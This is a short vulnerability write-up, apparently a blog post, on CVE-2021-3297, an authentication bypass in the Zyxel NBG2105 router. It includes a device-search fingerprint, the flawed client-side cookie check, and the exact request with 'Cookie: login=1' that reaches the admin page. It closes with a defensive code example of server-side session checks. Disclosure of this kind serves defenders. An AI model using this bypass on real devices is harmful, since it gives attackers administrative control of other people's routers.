Zyxel NBG2105 Authentication Bypass CVE-2021-3297

Vulnerability Description

The Zyxel NBG2105 has an authentication bypass: an attacker can use the login parameter to log in to the management backend.

Vulnerability Impact

Zyxel NBG2105

Network surveying and mapping

app="ZyXEL-NBG2105"

Vulnerability Reproduction

The login page is as follows:

[Screenshot: login page]

The front-end file /js/util_gw.js performs the verification of the login cookie parameter on the client side.

You can see that if login=1 is detected in the cookie, the page jumps to home.htm:

function setCookie() //login_ok.htm use
{
	document.cookie="login=1";
	MM_goToURL('parent', 'home.htm');
}

If the following request is sent, you are taken to the home.htm page as an administrator:

https://xxx.xxx.xxx.xxx/login_ok.htm

Cookie: login=1;
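The root cause described above is that the constant cookie login=1, which any client can set, is treated as proof of login. As an added example (not Zyxel firmware code; the function names and the sid cookie are hypothetical), this Node.js code contrasts that check with a server-side session check that has to run on every protected page such as home.htm:

```javascript
// Added example, not Zyxel firmware code. Function names and the "sid" cookie are hypothetical.
const crypto = require("node:crypto");

// Parse a Cookie request header into a name -> value map.
function parseCookies(header) {
  const out = Object.create(null);
  for (const part of (header || "").split(";")) {
    const i = part.indexOf("=");
    if (i > 0) out[part.slice(0, i).trim()] = part.slice(i + 1).trim();
  }
  return out;
}

// Weak pattern from the write-up: a fixed, client-chosen value decides access.
function isAuthenticatedWeak(cookieHeader) {
  return parseCookies(cookieHeader).login === "1";
}

// Hardened pattern: after a successful password check the server issues an
// unguessable session id and keeps the session state on its own side.
const sessions = new Map(); // session id -> expiry time (ms since epoch)

function createSession(now = Date.now(), ttlMs = 15 * 60 * 1000) {
  const sid = crypto.randomBytes(32).toString("hex"); // 256 bits from the CSPRNG
  sessions.set(sid, now + ttlMs);
  return sid; // sent as: Set-Cookie: sid=<value>; HttpOnly; Secure; SameSite=Strict
}

// Server-side gate for every protected resource, not only the login page.
function isAuthenticatedStrong(cookieHeader, now = Date.now()) {
  const sid = parseCookies(cookieHeader).sid;
  if (typeof sid !== "string" || !sessions.has(sid)) return false;
  if (sessions.get(sid) <= now) {
    sessions.delete(sid); // expired sessions are dropped, forcing a new login
    return false;
  }
  return true;
}
```
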


This post is licensed under CC BY 4.0 by the author.